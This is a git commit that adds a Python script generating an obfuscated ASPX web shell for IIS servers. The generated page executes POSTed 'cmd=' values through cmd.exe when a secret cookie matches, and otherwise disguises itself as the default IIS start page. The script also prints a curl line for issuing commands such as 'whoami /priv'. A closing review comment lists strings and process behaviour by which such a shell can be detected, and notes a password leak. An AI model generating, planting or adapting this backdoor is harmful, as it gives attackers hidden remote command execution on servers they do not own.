authorheqnx <root@heqnx.com>2025-05-13 21:50:38 +0300
committerheqnx <root@heqnx.com>2025-05-13 21:50:38 +0300
commit590afad8001ab4a4f2f1be2202da5c2dc8bcd3e2 (patch)
tree11edc244ec52e38d2f19786b4ba2c2af2f948582 /aspx-backdoor.py
parent4bf83d40291ed3942791759c740ee5541bf7092b (diff)
added simple aspx backdoor with iis templateHEADmain
Diffstat (limited to 'aspx-backdoor.py')
-rw-r--r--aspx-backdoor.py135
1 files changed, 135 insertions, 0 deletions
diff --git a/aspx-backdoor.py b/aspx-backdoor.py
new file mode 100644
index 0000000..1b53ade
--- /dev/null
+++ b/aspx-backdoor.py
@@ -0,0 +1,135 @@
+#!/usr/bin/env python3
+
+import os
+import re
+import random
+import string
+from textwrap import dedent
+from argparse import ArgumentParser
+
+def obfuscate(s):
+ pattern = r'\{\*(.*?)\*\}'
+ placeholder_values = {}
+
+ def get_or_generate_random_string(match):
+ placeholder = match.group(1)
+ if placeholder not in placeholder_values:
+ placeholder_values[placeholder] = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
+ return placeholder_values[placeholder]
+
+ result_string = re.sub(pattern, get_or_generate_random_string, s)
+
+ return result_string
+
+def generate_aspx_backdoor(args):
+ code = '200'
+ status = '200 OK'
+ iisstart_template = '''<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
+<title>IIS Windows Server</title>
+<style type="text/css">
+<!--
+body {
+ color:#000000;
+ background-color:#0072C6;
+ margin:0;
+}
+
+#container {
+ margin-left:auto;
+ margin-right:auto;
+ text-align:center;
+}
+
+a img {
+ border:none;
+}
+
+-->
+</style>
+</head>
+<body>
+<div id="container">
+<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
+</div>
+</body>
+</html>'''
+ lines = iisstart_template.split('\n')
+ processed_lines = ['"' + line.replace('"', '""') + '" & vbCrLf & _' for line in lines]
+ response = '\n'.join(processed_lines)
+ response = response.rstrip(' & vbCrLf & _')
+
+ backdoor = f'''<%@ Page Language="VB" Debug="true" %>
+<%@ Import Namespace="System.IO" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<%@ Import Namespace="System.Web" %>
+
+<script runat="server">
+ Sub Page_Load(ByVal {{*sender*}} As Object, ByVal {{*e*}} As EventArgs)
+ Dim {{*cookieMarker*}} As HttpCookie = Request.Cookies("{args.cookie_name}")
+ If {{*cookieMarker*}} IsNot Nothing AndAlso {{*cookieMarker*}}.Value = "{args.password}" Then
+ Dim {{*command1*}} As String = {{*GetCommandFromPost*}}()
+
+ If Not String.IsNullOrEmpty({{*command1*}}) Then
+ {{*command1*}} = HttpUtility.UrlDecode({{*command1*}})
+ {{*ExecuteCommand*}}({{*command1*}})
+ End If
+ Else
+ Response.StatusCode = {code}
+ Response.Status = "{status}"
+ Response.Write({response})
+ End If
+ End Sub
+
+ Function {{*GetCommandFromPost*}}() As String
+ Dim {{*commandParam*}} As String = "cmd="
+ Dim {{*command2*}} As String = Nothing
+
+ If Request.HttpMethod = "POST" Then
+ Using {{*reader*}} As New StreamReader(Request.InputStream)
+ Dim {{*requestBody*}} As String = {{*reader*}}.ReadToEnd()
+
+ Dim {{*cmdIndex*}} As Integer = {{*requestBody*}}.IndexOf({{*commandParam*}})
+ If {{*cmdIndex*}} <> -1 Then
+ {{*command2*}} = {{*requestBody*}}.Substring({{*cmdIndex*}} + {{*commandParam*}}.Length)
+ End If
+ End Using
+ End If
+
+ Return {{*command2*}}
+ End Function
+
+ Sub {{*ExecuteCommand*}}(ByVal {{*command3*}} As String)
+ Dim {{*myProcess*}} As New Process()
+ Dim {{*myProcessStartInfo*}} As New ProcessStartInfo("cmd.exe")
+ {{*myProcessStartInfo*}}.UseShellExecute = False
+ {{*myProcessStartInfo*}}.RedirectStandardOutput = True
+ {{*myProcessStartInfo*}}.Arguments = "/c " & {{*command3*}}
+ {{*myProcess*}}.StartInfo = {{*myProcessStartInfo*}}
+ {{*myProcess*}}.Start()
+
+ Dim {{*myStreamReader*}} As StreamReader = {{*myProcess*}}.StandardOutput
+ Dim {{*myString*}} As String = {{*myStreamReader*}}.ReadToEnd()
+ {{*myProcess*}}.Close()
+ Response.Write({{*myString*}})
+ End Sub
+</script>'''
+
+ with open(f'backdoor_{args.cookie_name}:{args.password}.aspx', 'w') as fh:
+ fh.write(obfuscate(backdoor))
+
+ print(f'[INFO] created aspx backdoor as "backdoor_{args.cookie_name}:{args.password}.aspx"')
+ print('[INFO] issue commands with:')
+ print('curl http://example.com/backdoor.aspx -H "Cookie: {args.cookie}={args.password}" -d "cmd=whoami /priv" -X POST')
+
+
+if __name__ == '__main__':
+ parser = ArgumentParser()
+ parser.add_argument('-c', '--cookie-name', required=True)
+ parser.add_argument('-p', '--password', required=True)
+ args = parser.parse_args()
+
+ generate_aspx_backdoor(args)
+
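Review bot: The new file has no module docstring, and `generate_aspx_backdoor` has none either, so nothing states what the emitted page does; a docstring such as `"""Write an ASPX page that runs a POSTed cmd= value via cmd.exe when the cookie matches, else returns the IIS start page with 200 OK."""` on the function would cover it. The documentation should also record what `obfuscate` leaves unchanged in every generated file, since it only renames the `{*...*}` identifiers: the `Debug="true"` page directive, the `System.Diagnostics` import, and the `"cmd.exe"` and `"cmd="` literals all survive verbatim. Those are the strings a web-root content rule can match, and at runtime the page shows up as the IIS worker process (w3wp.exe) starting `cmd.exe`. Separately, the `open(...)` and `print(...)` calls at the end of the function put `args.password` into the output file name and onto stdout, so the shared secret ends up in directory listings and terminal logs.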